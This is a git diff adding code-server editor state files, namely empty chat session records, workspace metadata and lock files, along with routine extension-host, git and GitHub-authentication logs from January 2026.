a/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/d21d60af-afdf-4015-ac22-8468113828ba/state.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/d21d60af-afdf-4015-ac22-8468113828ba/state.json new file mode 100755 index 0000000..4109398 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/d21d60af-afdf-4015-ac22-8468113828ba/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"fb90223f-d768-49ac-b71a-9f0787a256f8","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426/state.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426/state.json new file mode 100755 index 0000000..4c6e47c --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"7ba58696-2131-4e2f-b332-decd8bd7902e","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/db5da8e2-e0b3-43bd-a73f-59c06d1367d1/state.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/db5da8e2-e0b3-43bd-a73f-59c06d1367d1/state.json new file mode 100755 index 0000000..f6043c3 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/db5da8e2-e0b3-43bd-a73f-59c06d1367d1/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"0321fd0c-6927-486d-88ef-893e624a53cf","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/df31879f-7816-4000-922a-1ae16dfa748e/state.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/df31879f-7816-4000-922a-1ae16dfa748e/state.json new file mode 100755 index 0000000..4bb413f --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/df31879f-7816-4000-922a-1ae16dfa748e/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"08a5290f-ecb0-4ae1-a93e-1a868942eb2b","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/508a716e-f283-436b-b9c7-f68336e877d2.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/508a716e-f283-436b-b9c7-f68336e877d2.json new file mode 100755 index 0000000..5f12f35 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/508a716e-f283-436b-b9c7-f68336e877d2.json @@ -0,0 +1,33 @@ +{ + "version": 3, + "responderUsername": "", + "initialLocation": "panel", + "requests": [], + "sessionId": "508a716e-f283-436b-b9c7-f68336e877d2", + "creationDate": 1768866360085, + "lastMessageDate": 1768866360085, + "hasPendingEdits": false, + "inputState": { + "contrib": { + "chatDynamicVariableModel": [] + }, + "attachments": [], + "mode": { + "id": "agent", + "kind": "agent" + }, + "inputText": "", + "selections": [ + { + "startLineNumber": 1, + "startColumn": 1, + "endLineNumber": 1, + "endColumn": 1, + "selectionStartLineNumber": 1, + "selectionStartColumn": 1, + "positionLineNumber": 1, + "positionColumn": 1 + } + ] + } +} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/d21d60af-afdf-4015-ac22-8468113828ba.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/d21d60af-afdf-4015-ac22-8468113828ba.json new file mode 100755 index 0000000..4e510e8 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/d21d60af-afdf-4015-ac22-8468113828ba.json @@ -0,0 +1,33 @@ +{ + "version": 3, + "responderUsername": "", + "initialLocation": "panel", + "requests": [], + "sessionId": "d21d60af-afdf-4015-ac22-8468113828ba", + "creationDate": 1769019639897, + "lastMessageDate": 1769019639897, + "hasPendingEdits": false, + "inputState": { + "contrib": { + "chatDynamicVariableModel": [] + }, + "attachments": [], + "mode": { + "id": "ask", + "kind": "ask" + }, + "inputText": "", + "selections": [ + { + "startLineNumber": 1, + "startColumn": 1, + "endLineNumber": 1, + "endColumn": 1, + "selectionStartLineNumber": 1, + "selectionStartColumn": 1, + "positionLineNumber": 1, + "positionColumn": 1 + } + ] + } +} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426.json new file mode 100755 index 0000000..35c5bc9 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426.json @@ -0,0 +1,33 @@ +{ + "version": 3, + "responderUsername": "", + "initialLocation": "panel", + "requests": [], + "sessionId": "daa34a05-12c3-4f1d-b7c1-6dbcf59e3426", + "creationDate": 1768925284502, + "lastMessageDate": 1768925284502, + "hasPendingEdits": false, + "inputState": { + "contrib": { + "chatDynamicVariableModel": [] + }, + "attachments": [], + "mode": { + "id": "agent", + "kind": "agent" + }, + "inputText": "", + "selections": [ + { + "startLineNumber": 1, + "startColumn": 1, + "endLineNumber": 1, + "endColumn": 1, + "selectionStartLineNumber": 1, + "selectionStartColumn": 1, + "positionLineNumber": 1, + "positionColumn": 1 + } + ] + } +} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/df31879f-7816-4000-922a-1ae16dfa748e.json b/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/df31879f-7816-4000-922a-1ae16dfa748e.json new file mode 100755 index 0000000..bd61868 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/df31879f-7816-4000-922a-1ae16dfa748e.json @@ -0,0 +1,33 @@ +{ + "version": 3, + "responderUsername": "", + "initialLocation": "panel", + "requests": [], + "sessionId": "df31879f-7816-4000-922a-1ae16dfa748e", + "creationDate": 1769105550754, + "lastMessageDate": 1769105550754, + "hasPendingEdits": false, + "inputState": { + "contrib": { + "chatDynamicVariableModel": [] + }, + "attachments": [], + "mode": { + "id": "ask", + "kind": "ask" + }, + "inputText": "", + "selections": [ + { + "startLineNumber": 1, + "startColumn": 1, + "endLineNumber": 1, + "endColumn": 1, + "selectionStartLineNumber": 1, + "selectionStartColumn": 1, + "positionLineNumber": 1, + "positionColumn": 1 + } + ] + } +} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-54297bf2/vscode.lock b/code-server-config/data/User/workspaceStorage/-54297bf2/vscode.lock new file mode 100755 index 0000000..e14a7fb --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-54297bf2/vscode.lock @@ -0,0 +1 @@ +{"pid":196294,"willReleaseAt":0} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions/a91fca11-9919-49b2-9aab-55a4263a881f/state.json b/code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions/a91fca11-9919-49b2-9aab-55a4263a881f/state.json new file mode 100755 index 0000000..f4251e7 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions/a91fca11-9919-49b2-9aab-55a4263a881f/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"20a3c181-93c5-41d7-bb3e-4f08b352c185","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/-63ce429/chatSessions/a91fca11-9919-49b2-9aab-55a4263a881f.json b/code-server-config/data/User/workspaceStorage/-63ce429/chatSessions/a91fca11-9919-49b2-9aab-55a4263a881f.json new file mode 100755 index 0000000..5f0245f --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/-63ce429/chatSessions/a91fca11-9919-49b2-9aab-55a4263a881f.json @@ -0,0 +1,33 @@ +{ + "version": 3, + "responderUsername": "", + "initialLocation": "panel", + "requests": [], + "sessionId": "a91fca11-9919-49b2-9aab-55a4263a881f", + "creationDate": 1768866036243, + "lastMessageDate": 1768866036243, + "hasPendingEdits": false, + "inputState": { + "contrib": { + "chatDynamicVariableModel": [] + }, + "attachments": [], + "mode": { + "id": "agent", + "kind": "agent" + }, + "inputText": "", + "selections": [ + { + "startLineNumber": 1, + "startColumn": 1, + "endLineNumber": 1, + "endColumn": 1, + "selectionStartLineNumber": 1, + "selectionStartColumn": 1, + "positionLineNumber": 1, + "positionColumn": 1 + } + ] + } +} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673/state.json b/code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673/state.json new file mode 100755 index 0000000..3b5218a --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"c3649f0b-7e7c-4fe7-ace1-c43230ba7099","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/64cc123a/chatSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673.json b/code-server-config/data/User/workspaceStorage/64cc123a/chatSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673.json new file mode 100755 index 0000000..b28d4e2 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/64cc123a/chatSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673.json @@ -0,0 +1,33 @@ +{ + "version": 3, + "responderUsername": "", + "initialLocation": "panel", + "requests": [], + "sessionId": "ff708a20-4b56-4c2d-8af1-bf0a107df673", + "creationDate": 1768865975339, + "lastMessageDate": 1768865975339, + "hasPendingEdits": false, + "inputState": { + "contrib": { + "chatDynamicVariableModel": [] + }, + "attachments": [], + "mode": { + "id": "agent", + "kind": "agent" + }, + "inputText": "", + "selections": [ + { + "startLineNumber": 1, + "startColumn": 1, + "endLineNumber": 1, + "endColumn": 1, + "selectionStartLineNumber": 1, + "selectionStartColumn": 1, + "positionLineNumber": 1, + "positionColumn": 1 + } + ] + } +} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/64cc123a/meta.json b/code-server-config/data/User/workspaceStorage/64cc123a/meta.json new file mode 100755 index 0000000..93be8ca --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/64cc123a/meta.json @@ -0,0 +1,4 @@ +{ + "id": "64cc123a", + "name": "workspace" +} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/64cc123a/vscode.lock b/code-server-config/data/User/workspaceStorage/64cc123a/vscode.lock new file mode 100755 index 0000000..833bd4d --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/64cc123a/vscode.lock @@ -0,0 +1 @@ +{"pid":1122,"willReleaseAt":0} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions/d5306add-574b-4ca9-80a2-e738a2954019/state.json b/code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions/d5306add-574b-4ca9-80a2-e738a2954019/state.json new file mode 100755 index 0000000..fbc7cda --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions/d5306add-574b-4ca9-80a2-e738a2954019/state.json @@ -0,0 +1 @@ +{"version":2,"initialFileContents":[],"timeline":{"checkpoints":[{"checkpointId":"054cba8c-e3bd-4f98-ad33-b143a57a64e7","epoch":0,"label":"Initial State","description":"Starting point before any edits"}],"currentEpoch":1,"fileBaselines":[],"operations":[],"epochCounter":1},"recentSnapshot":{"entries":[]}} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/787b6db1/chatSessions/d5306add-574b-4ca9-80a2-e738a2954019.json b/code-server-config/data/User/workspaceStorage/787b6db1/chatSessions/d5306add-574b-4ca9-80a2-e738a2954019.json new file mode 100755 index 0000000..9741288 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/787b6db1/chatSessions/d5306add-574b-4ca9-80a2-e738a2954019.json @@ -0,0 +1,33 @@ +{ + "version": 3, + "responderUsername": "", + "initialLocation": "panel", + "requests": [], + "sessionId": "d5306add-574b-4ca9-80a2-e738a2954019", + "creationDate": 1768891463711, + "lastMessageDate": 1768891463711, + "hasPendingEdits": false, + "inputState": { + "contrib": { + "chatDynamicVariableModel": [] + }, + "attachments": [], + "mode": { + "id": "agent", + "kind": "agent" + }, + "inputText": "", + "selections": [ + { + "startLineNumber": 1, + "startColumn": 1, + "endLineNumber": 1, + "endColumn": 1, + "selectionStartLineNumber": 1, + "selectionStartColumn": 1, + "positionLineNumber": 1, + "positionColumn": 1 + } + ] + } +} \ No newline at end of file diff --git a/code-server-config/data/User/workspaceStorage/787b6db1/meta.json b/code-server-config/data/User/workspaceStorage/787b6db1/meta.json new file mode 100755 index 0000000..d9a7360 --- /dev/null +++ b/code-server-config/data/User/workspaceStorage/787b6db1/meta.json @@ -0,0 +1,4 @@ +{ + "id": "787b6db1", + "name": "project" +} \ No newline at end of file diff --git a/code-server-config/data/coder.json b/code-server-config/data/coder.json new file mode 100755 index 0000000..f954fbd --- /dev/null +++ b/code-server-config/data/coder.json @@ -0,0 +1,9 @@ +{ + "query": { + "folder": "/home/coder/project" + }, + "update": { + "checked": 1769085519465, + "version": "4.108.1" + } +} \ No newline at end of file diff --git a/code-server-config/data/logs/20260120T003918/exthost1/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T003918/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T003918/exthost1/remoteexthost.log b/code-server-config/data/logs/20260120T003918/exthost1/remoteexthost.log new file mode 100755 index 0000000..40cec4c --- /dev/null +++ b/code-server-config/data/logs/20260120T003918/exthost1/remoteexthost.log @@ -0,0 +1,10 @@ +2026-01-20 00:39:38.583 [info] Extension host with pid 1122 started +2026-01-20 00:39:38.605 [info] Lock '/config/data/User/workspaceStorage/64cc123a/vscode.lock': Lock acquired. +2026-01-20 00:39:38.860 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-20 00:39:38.862 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-20 00:39:39.016 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*' +2026-01-20 00:39:39.082 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-20 00:39:39.210 [info] Eager extensions activated +2026-01-20 00:39:39.211 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 00:39:39.211 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 00:39:43.532 [info] ExtensionService#_doActivateExtension vscode.git, startup: false, activationEvent: 'api', root cause: vscode.github diff --git a/code-server-config/data/logs/20260120T003918/exthost1/vscode.git/Git.log b/code-server-config/data/logs/20260120T003918/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..50a565e --- /dev/null +++ b/code-server-config/data/logs/20260120T003918/exthost1/vscode.git/Git.log @@ -0,0 +1,8 @@ +2026-01-20 00:39:43.745 [info] [main] Log level: Info +2026-01-20 00:39:43.745 [info] [main] Validating found git in: "git" +2026-01-20 00:39:43.745 [info] [main] Using git "2.43.0" from "git" +2026-01-20 00:39:43.745 [info] [Model][doInitialScan] Initial repository scan started +2026-01-20 00:39:43.745 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 00:39:43.745 [info] fatal: not a git repository (or any parent up to mount point /) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:39:43.745 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) diff --git a/code-server-config/data/logs/20260120T003918/exthost1/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T003918/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..c857b5f --- /dev/null +++ b/code-server-config/data/logs/20260120T003918/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,31 @@ +2026-01-20 00:39:39.108 [info] Reading sessions from keychain... +2026-01-20 00:39:39.108 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.108 [info] Got 0 sessions for ... +2026-01-20 00:39:39.108 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.108 [info] Got 0 sessions for ... +2026-01-20 00:39:39.108 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.108 [info] Got 0 sessions for ... +2026-01-20 00:39:39.108 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.108 [info] Got 0 sessions for ... +2026-01-20 00:39:39.108 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.108 [info] Got 0 sessions for ... +2026-01-20 00:39:39.108 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.108 [info] Got 0 sessions for ... +2026-01-20 00:39:39.108 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.108 [info] Got 0 sessions for ... +2026-01-20 00:39:39.108 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.108 [info] Got 0 sessions for ... +2026-01-20 00:39:39.108 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.108 [info] Got 0 sessions for ... +2026-01-20 00:39:39.159 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.159 [info] Got 0 sessions for ... +2026-01-20 00:39:39.210 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.210 [info] Got 0 sessions for ... +2026-01-20 00:39:39.210 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.210 [info] Got 0 sessions for ... +2026-01-20 00:39:39.211 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.231 [info] Got 0 sessions for ... +2026-01-20 00:39:39.231 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.231 [info] Got 0 sessions for ... +2026-01-20 00:39:39.231 [info] Getting sessions for all scopes... +2026-01-20 00:39:39.231 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T003918/exthost1/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T003918/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..b8f15de --- /dev/null +++ b/code-server-config/data/logs/20260120T003918/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-20 00:39:39.342 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T003918/exthost2/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T003918/exthost2/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T003918/exthost2/remoteexthost.log b/code-server-config/data/logs/20260120T003918/exthost2/remoteexthost.log new file mode 100755 index 0000000..ef81e19 --- /dev/null +++ b/code-server-config/data/logs/20260120T003918/exthost2/remoteexthost.log @@ -0,0 +1,10 @@ +2026-01-20 00:40:38.156 [info] Extension host with pid 2922 started +2026-01-20 00:40:38.174 [info] Lock '/config/data/User/workspaceStorage/-63ce429/vscode.lock': Lock acquired. +2026-01-20 00:40:38.358 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-20 00:40:38.360 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-20 00:40:38.489 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*' +2026-01-20 00:40:38.504 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-20 00:40:38.588 [info] Eager extensions activated +2026-01-20 00:40:38.588 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 00:40:38.588 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 00:40:40.036 [info] ExtensionService#_doActivateExtension vscode.git, startup: false, activationEvent: 'api', root cause: vscode.github diff --git a/code-server-config/data/logs/20260120T003918/exthost2/vscode.git/Git.log b/code-server-config/data/logs/20260120T003918/exthost2/vscode.git/Git.log new file mode 100755 index 0000000..a2c06b1 --- /dev/null +++ b/code-server-config/data/logs/20260120T003918/exthost2/vscode.git/Git.log @@ -0,0 +1,8 @@ +2026-01-20 00:40:40.181 [info] [main] Log level: Info +2026-01-20 00:40:40.181 [info] [main] Validating found git in: "git" +2026-01-20 00:40:40.181 [info] [main] Using git "2.43.0" from "git" +2026-01-20 00:40:40.181 [info] [Model][doInitialScan] Initial repository scan started +2026-01-20 00:40:40.181 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 00:40:40.181 [info] fatal: not a git repository (or any parent up to mount point /) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:40:40.181 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) diff --git a/code-server-config/data/logs/20260120T003918/exthost2/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T003918/exthost2/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..70ad1c4 --- /dev/null +++ b/code-server-config/data/logs/20260120T003918/exthost2/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-20 00:40:38.527 [info] Reading sessions from keychain... +2026-01-20 00:40:38.527 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.527 [info] Got 0 sessions for ... +2026-01-20 00:40:38.527 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.527 [info] Got 0 sessions for ... +2026-01-20 00:40:38.527 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.527 [info] Got 0 sessions for ... +2026-01-20 00:40:38.527 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.527 [info] Got 0 sessions for ... +2026-01-20 00:40:38.527 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.527 [info] Got 0 sessions for ... +2026-01-20 00:40:38.527 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.527 [info] Got 0 sessions for ... +2026-01-20 00:40:38.527 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.527 [info] Got 0 sessions for ... +2026-01-20 00:40:38.527 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.527 [info] Got 0 sessions for ... +2026-01-20 00:40:38.527 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.527 [info] Got 0 sessions for ... +2026-01-20 00:40:38.529 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.529 [info] Got 0 sessions for ... +2026-01-20 00:40:38.529 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.530 [info] Got 0 sessions for ... +2026-01-20 00:40:38.530 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.530 [info] Got 0 sessions for ... +2026-01-20 00:40:38.530 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.530 [info] Got 0 sessions for ... +2026-01-20 00:40:38.530 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.530 [info] Got 0 sessions for ... +2026-01-20 00:40:38.530 [info] Getting sessions for all scopes... +2026-01-20 00:40:38.530 [info] Got 0 sessions for ... +2026-01-20 00:40:39.811 [info] Getting sessions for all scopes... +2026-01-20 00:40:39.811 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T003918/exthost2/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T003918/exthost2/vscode.github/GitHub.log new file mode 100755 index 0000000..4fea784 --- /dev/null +++ b/code-server-config/data/logs/20260120T003918/exthost2/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-20 00:40:38.635 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T003918/remoteagent.log b/code-server-config/data/logs/20260120T003918/remoteagent.log new file mode 100755 index 0000000..15e73e5 --- /dev/null +++ b/code-server-config/data/logs/20260120T003918/remoteagent.log @@ -0,0 +1,20 @@ +2026-01-20 00:39:18.166 [info] + + + + +2026-01-20 00:39:18.176 [info] Extension host agent started. +2026-01-20 00:39:18.188 [info] Started initializing default profile extensions in extensions installation folder. file:///config/extensions +2026-01-20 00:39:18.205 [info] Completed initializing default profile extensions in extensions installation folder. file:///config/extensions +2026-01-20 00:39:34.787 [info] [172.21.0.5][bc07b6d0][ManagementConnection] New connection established. +2026-01-20 00:39:36.519 [info] [172.21.0.5][7f4f9863][ExtensionHostConnection] New connection established. +2026-01-20 00:39:36.567 [info] [172.21.0.5][7f4f9863][ExtensionHostConnection] <1122> Launched Extension Host Process. +2026-01-20 00:39:36.837 [info] [172.21.0.5][7f4f9863][ExtensionHostConnection] <1122> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-20 00:40:25.078 [info] [172.21.0.5][bc07b6d0][ManagementConnection] The client has disconnected, will wait for reconnection 3h before disposing... +2026-01-20 00:40:36.844 [info] [172.21.0.5][bc07b6d0][ManagementConnection] Another client has connected, will shorten the wait for reconnection 5m before disposing... +2026-01-20 00:40:36.845 [info] [192.168.100.179][8052f23f][ManagementConnection] New connection established. +2026-01-20 00:40:37.571 [info] [192.168.100.179][1ef4bc34][ExtensionHostConnection] New connection established. +2026-01-20 00:40:37.581 [info] [192.168.100.179][1ef4bc34][ExtensionHostConnection] <2922> Launched Extension Host Process. +2026-01-20 00:40:37.880 [info] [192.168.100.179][1ef4bc34][ExtensionHostConnection] <2922> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + diff --git a/code-server-config/data/logs/20260120T004510/exthost1/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T004510/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T004510/exthost1/remoteexthost.log b/code-server-config/data/logs/20260120T004510/exthost1/remoteexthost.log new file mode 100755 index 0000000..65d7716 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost1/remoteexthost.log @@ -0,0 +1,17 @@ +2026-01-20 00:45:21.640 [info] Extension host with pid 720 started +2026-01-20 00:45:21.640 [error] Error: EEXIST: file already exists, open '/config/data/User/workspaceStorage/-63ce429/vscode.lock' +2026-01-20 00:45:21.641 [info] Lock '/config/data/User/workspaceStorage/-63ce429/vscode.lock': Could not acquire lock, checking if the file is stale. +2026-01-20 00:45:21.641 [info] Lock '/config/data/User/workspaceStorage/-63ce429/vscode.lock': The pid 2922 appears to be gone. +2026-01-20 00:45:21.641 [info] Lock '/config/data/User/workspaceStorage/-63ce429/vscode.lock': Deleting a stale lock. +2026-01-20 00:45:21.647 [info] Lock '/config/data/User/workspaceStorage/-63ce429/vscode.lock': Lock acquired. +2026-01-20 00:45:21.727 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-20 00:45:21.728 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-20 00:45:21.853 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-20 00:45:21.884 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-20 00:45:21.884 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-20 00:45:22.020 [info] Eager extensions activated +2026-01-20 00:45:22.020 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 00:45:22.021 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 03:46:32.417 [info] Extension host terminating: renderer disconnected for too long (1) +2026-01-20 03:46:32.419 [info] Lock '/config/data/User/workspaceStorage/-63ce429/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-20 03:46:32.441 [info] Extension host with pid 720 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T004510/exthost1/vscode.git/Git.log b/code-server-config/data/logs/20260120T004510/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..50465e9 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost1/vscode.git/Git.log @@ 